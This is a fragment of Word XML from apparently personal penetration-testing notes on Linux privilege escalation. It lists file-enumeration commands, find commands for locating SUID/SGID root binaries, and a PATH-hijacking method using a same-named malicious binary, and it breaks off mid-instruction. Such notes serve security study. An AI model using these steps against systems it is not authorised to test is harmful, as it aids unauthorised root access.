        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r w:rsidRPr="00C3613A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Useful File Locations</w:t>
      </w:r>
      <w:r w:rsidR="008261D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (What to do once in)</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18"/>
        <w:gridCol w:w="8098"/>
      </w:tblGrid>
      <w:tr w:rsidR="008261D4" w14:paraId="6A13F973" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="129F98B8" w14:textId="1670670F" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="76161017" w14:textId="7F7D0020" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Useful File Locations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="729FBE77" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00C3613A">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Linux/Unix</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35D28ED7" w14:textId="77777777" w:rsidR="00CD17A4" w:rsidRDefault="00CD17A4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6E3E2E73" w14:textId="00F83848" w:rsidR="00CD17A4" w:rsidRPr="00CD17A4" w:rsidRDefault="00CD17A4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD17A4">
              <w:t>Visit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3C7FEDA1" w14:textId="1F50EF52" w:rsidR="00CD17A4" w:rsidRPr="00CD17A4" w:rsidRDefault="00CD17A4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CD17A4">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>gtfobins.github.io/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3948E730" w14:textId="77777777" w:rsidR="00CD17A4" w:rsidRDefault="00CD17A4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00CD17A4">
              <w:t>For useful files that may be exploitable to escalate privileges.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7F995C" w14:textId="77777777" w:rsidR="00F17BB5" w:rsidRDefault="00F17BB5" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2C80995D" w14:textId="77777777" w:rsidR="00F17BB5" w:rsidRDefault="00F17BB5" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Visit:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E3E0ED5" w14:textId="77777777" w:rsidR="00F17BB5" w:rsidRPr="00F17BB5" w:rsidRDefault="00F17BB5" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00F17BB5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>fieldraccoon.github.io</w:t>
            </w:r>
            <w:r w:rsidRPr="00F17BB5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00F17BB5">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>/posts/Linuxprivesc/</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FB274CF" w14:textId="43CECB67" w:rsidR="00F17BB5" w:rsidRPr="00F17BB5" w:rsidRDefault="00F17BB5" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>For useful ways of exploiting various programs to gain root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4386C85A" w14:textId="071FC105" w:rsidR="008261D4" w:rsidRPr="00D2375C" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>ONCE IN A SYSTEM, SEARCH FOR INTERESTING FILES USING CD AND CAT COMMANS.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:t>Once in a system as user, it usually a good idea to snoop around looking for admin credentials, other usernames and passwords and any other useful information.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:br/>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D945758" w14:textId="6D3A9AB2" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>The useful commands to enumerate file systems are:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00F54389">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>locate</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Useful search tool</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Change directory</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Go up one directory</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>pwd</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Print working dir</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Same as dir</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>dir</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show files</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-al</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show all files, including hidden files</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cat</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Print text from a file</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Same as cat (works in MS shells)</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>touch</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Create a file</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00D2375C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-l</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Check any sudo privileges</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A37381">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>Prints username (can see if we have root account or not)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="147BBD25" w14:textId="05382438" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C97CD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>nbtstat</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>NetBIOS</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C97CD1">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>net use</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show any shared folders</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00DD23A8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>finger</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Show user info</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="0E12928B" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="69967151" w14:textId="54CA8A8D" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4B861A86" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="684AFC3C" w14:textId="3663A807" w:rsidR="008261D4" w:rsidRPr="00435A41" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r w:rsidRPr="00435A41">
              <w:t>SUID bits can be dangerous, some binaries such as passwd need to be run with elevated privileges (as its resetting your password on the system), however other files could have the SUID bit which can lead to elevation privileges. Use</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> the</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>find</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:t>:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D187CBC" w14:textId="62B13648" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-perm -u=</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>s</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-type</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>f</w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00435A41">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>2&gt;/dev/null</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="437C6031" w14:textId="5CA2781A" w:rsidR="00367CF0" w:rsidRPr="00367CF0" w:rsidRDefault="00367CF0" w:rsidP="008261D4">
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00367CF0">
              <w:t>Or,</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00367CF0">
              <w:t xml:space="preserve"> you can try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FE65FF9" w14:textId="64870C5D" w:rsidR="00367CF0" w:rsidRDefault="00367CF0" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> find </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">/ </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-user </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">root </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-perm -4000 -exec</w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> ls </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>ldb</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00367CF0">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>{} \;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="126A15B2" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E383A">
              <w:t>Then, check if it is run with root privilieges as a user or group:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-al </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FULL_FILE_NAME</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="72B4684F" w14:textId="2F2C8BF8" w:rsidR="008261D4" w:rsidRPr="00D2375C" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008E383A">
              <w:t>This is done by examining the permissions</w:t>
            </w:r>
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:t xml:space="preserve"> you want an ‘s’ bit as the 4</w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:t xml:space="preserve"> bit</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> (SUID)</w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:t xml:space="preserve"> if the file has root as the file owner (first word), or an ‘s’</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> as the 7</w:t>
            </w:r>
            <w:r w:rsidRPr="008E383A">
              <w:rPr>
                <w:vertAlign w:val="superscript"/>
              </w:rPr>
              <w:t>th</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> bit (SGID) if the file has root as the group owner (second word)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="4E68308C" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4905FB4A" w14:textId="1191A56C" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="058619F5" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="435FF647" w14:textId="3ED7EB35" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>Strings is a command on Linux that looks for human readable strings in a binary file:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="049E77D7" w14:textId="452CCBE6" w:rsidR="008261D4" w:rsidRPr="00435A41" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00E47E19">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">strings </w:t>
            </w:r>
            <w:r w:rsidRPr="00E47E19">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILE_NAME</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008261D4" w14:paraId="37C9520D" w14:textId="77777777" w:rsidTr="008261D4">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="33419F4A" w14:textId="3B58C78A" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>78.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2318" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="CCFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="77889F43" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8098" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DADE09F" w14:textId="2735C3ED" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF YOU CAN FIND A FILE THAT USES A BINARY WITHOUT A FULL PATH (SUCH AS CURL OR UNAME) YOU CAN INSERT YOUR OWN MALICIOUS VERSION OF THE BINARY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> WITH THE SAME NAME</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="004A734C">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> IN A LOCATION THAT THE COMPUTER WILL LOOK IN BEFORE THE ORIGINAL BINARY’S LOCATION.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54AA152B" w14:textId="464F6D1F" w:rsidR="008261D4" w:rsidRPr="005656CB" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r w:rsidRPr="005656CB">
              <w:t xml:space="preserve">Use the above </w:t>
            </w:r>
            <w:r w:rsidRPr="005656CB">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">find </w:t>
            </w:r>
            <w:r w:rsidRPr="005656CB">
              <w:t>command (78.b) to find an executable file that</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="727A1387" w14:textId="37B9603D" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t xml:space="preserve">Use the </w:t>
            </w:r>
            <w:r w:rsidRPr="006E6DA8">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">export </w:t>
            </w:r>
            <w:r>
              <w:t>command to see what environment variables exist on the machine.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76A2D72C" w14:textId="77777777" w:rsidR="008261D4" w:rsidRDefault="008261D4" w:rsidP="008261D4">
            <w:r>
              <w:t>Use this command with parameters to add in a new directory location to the path:</w:t>
            </w:r>
          </w:p>
